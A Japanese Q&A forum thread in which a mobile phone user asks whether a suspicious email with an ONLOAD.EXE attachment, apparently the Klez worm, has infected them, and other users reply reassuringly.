• 締切済み

AU携帯に入ったメールの事で・・・

友人ふたりから、こんなメールが携帯にきました。 題名:Visibility 内容はありません。 添付ファイル:ONLOAD.EXE その下に:<HTML><HEAD></HEAD><BODY>      iframe src=3DC1・・・ 添付ファイルは対応していないファイル形式で、開くことは出来ませんでした。 友人二人はともに送っていないそうです。 ウィルスのようなので、あわてて削除してしまいましたが、 その後調べてみて、「クレズ」のようだとわかりました。 メールを送られた私は、感染したのでしょうか。 また削除したことは、何か影響ありますか? 携帯にウィルスのワクチンはあるのですか? すみません、何も分からない状態ですので、よろしくお願いします。

• efgon
  • お礼率100% (1/1)

みんなの回答

• Raphael
回答No.1

携帯ならその様なファイルは実行できないので問題ないんじゃないですか? その友人のアドレスは携帯のアドレスですか? それともパソコンのアドレスですか?

efgon
質問者

お礼

昨日メール送信もとの友人から、 「ウィルス感染者が分かった。自分はファイルを開いてしまったので、パソコンを買った状態に 戻した」とメールが来ました。たぶん対処出来ていると思います。 私の方も大丈夫そうなので、一件落着ですね。ありがとうございました。

efgon
質問者

補足

問題ないと聞いて安心しました。 ありがとうございました。 友人の一人は携帯のアドレスで、もう一人はパソコンのアドレスでした。 その友人の所にも、私と共通の友人から同じ様なメールが届いていたそうです。 感染者が心配なのですが、5月6日の破壊が始まるまで、誰か分かる方法は無いのでしょうか?